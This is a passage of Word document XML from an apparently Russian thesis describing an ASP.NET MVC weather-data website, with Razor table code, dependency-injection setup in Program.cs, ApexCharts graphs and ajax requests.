    <w:p w14:paraId="7800A961" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="007C3C24" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>decimal</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>winddir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = @</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>measure.winddir</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/1200*360;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6EDB7C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E6F797"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>date.ToString</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">"yyyy-MM-dd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>HH:mm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>td</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB54A0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t_pov</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>td</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4BC49"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far</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>td</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4118380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rh</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>td</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59293F06"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>td</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63C005"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r w:rsidRPr="007C3C24">
        <w:t>Math</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">.Round(winddir, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>td</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CA367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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>measure.wind</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>td</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F97507D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF7912B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="007C3C24" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6688FC94"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body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EB16D"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able</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F97F82" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="007C3C24" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9D810E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="007C3C24" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386CE654" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="007C3C24" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CD021A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="001F04F3" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Данных</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>за</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>выбранную</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>дату</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>нет</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D67445" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49371FDB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CDF584" w14:textId="2EFAAFD8" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:r>
        <w:t>В самом начале файла необходимо определить переменную модели, тип которой должен совпадать с типом, который был указан в параметре возвращаемого значения соответствующего контроллера, и далее, обращаясь к переменной модели</w:t>
      </w:r>
      <w:r w:rsidR="00D7766A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> можно отображать данные, например, как в вышеописанном примере через таблицу, чередуя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">разметку и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">код. В этом и состоит главное преимущество технологии программирования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – разделение модели, контроллеров и представлений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250A472" w14:textId="3C9C4953" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Данное частичное представление возможно отобразить в главной странице, где находится основная разметка. Таким же способом на основной странице отображаются шапка сайт</w:t>
      </w:r>
      <w:r w:rsidR="00D7766A">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с панелью навигации, кнопками входа и регистрации и подвал сайта. Благодаря такому подходу получается избежать дублировани</w:t>
      </w:r>
      <w:r w:rsidR="00D7766A">
        <w:t>я</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> кода, если будет необходимость добавлять новые страницы, где будет возможность отображать частичные представления следующим кодом, где асинхронно вызывается метод контроллера с названием данного метода в параметре:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC15493" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00061001" w:rsidRDefault="0093378B" w:rsidP="00061001">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00061001">
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00061001">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidRPr="00061001">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00061001">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00061001">
        <w:t>="main-header"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D656DB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00061001" w:rsidRDefault="0093378B" w:rsidP="00061001">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00061001">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    @</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00061001">
        <w:t>await</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00061001">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00061001">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Html.PartialAsync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00061001">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00061001">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"_Header"</w:t>
      </w:r>
      <w:r w:rsidRPr="00061001">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACEE607" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="001F04F3" w:rsidRDefault="0093378B" w:rsidP="00061001">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B658B" w14:textId="21E72E10" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:r>
        <w:t xml:space="preserve">Финальной частью реализации архитектуры «внедрение зависимостей» является добавление в файл </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Program.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">конфигурационных правок. Этот файл отвечает за запуск и конфигурацию приложения. Для корректной работы веб-приложения необходимо добавить строчку </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73537EE1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:t>builder.Services.AddTransient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:t>IMeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:t>MeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:t>&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A30972" w14:textId="7A0121F7" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00E662A4">
      <w:r>
        <w:t>Тем самым сообща</w:t>
      </w:r>
      <w:r w:rsidR="00D7766A">
        <w:t>ем</w:t>
      </w:r>
      <w:r>
        <w:t>, что в данном проекте используется внедрение зависимостей, и указыва</w:t>
      </w:r>
      <w:r w:rsidR="00D7766A">
        <w:t>ем</w:t>
      </w:r>
      <w:r>
        <w:t>, какой интерфейс, используемый в контроллере, соответствует репозиторию объектов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117AB770" w14:textId="4CA8241B" w:rsidR="0093378B" w:rsidRDefault="00A15631" w:rsidP="002747E5">
      <w:r>
        <w:t>Т</w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t xml:space="preserve">аблица из пользовательского графического интерфейса соответствует структуре, и тем данным, что содержатся в </w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002747E5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t>Операция визуализации данных посредством реализации архитектурного решения «внедрение зависимостей» проведена успешно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AAF28C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="002747E5">
      <w:r>
        <w:t xml:space="preserve">Далее необходимо описать, каким образом формируются графики на сайте. Сама реализация графического представления данных не была реализована разработчиком, отображение графиков реализует бесплатная </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">библиотека </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ApexCharts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> [https://apexcharts.com/].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0127E2BE" w14:textId="0678FEBF" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="002747E5">
      <w:r>
        <w:t xml:space="preserve">Логика формирования графиков и взаимодействия кнопок описаны в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файлах, код представлен в Приложении </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>А</w:t>
      </w:r>
      <w:r>
        <w:t>. Далее следует рассмотреть основной принцип визуализации данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72324C7E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="002747E5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3C0A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файле создается обработчик события инициализации страницы для изначальной отрисовки графиков и обработчики событий на кнопки изменения даты, при нажатии которых необходимо обновить информацию в графиках. При срабатывании обработчика события вызывается функция создания графиков или обновления, которые описаны в Приложении В. Наиболее интересной частью кода является создание </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ajax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3C0A">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3C0A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">запроса. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3C0A">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3C0A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">запрос – это асинхронный способ обращения к методу контроллера. Такой механизм необходим для связи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> файлов и контроллеров приложения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3C0A">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3C0A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">В данном запросе необходимо указать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC3C0A">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ссылку с названием самого контроллера и метода действия, в который необходимо передать данные полученные из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> тега посредством </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
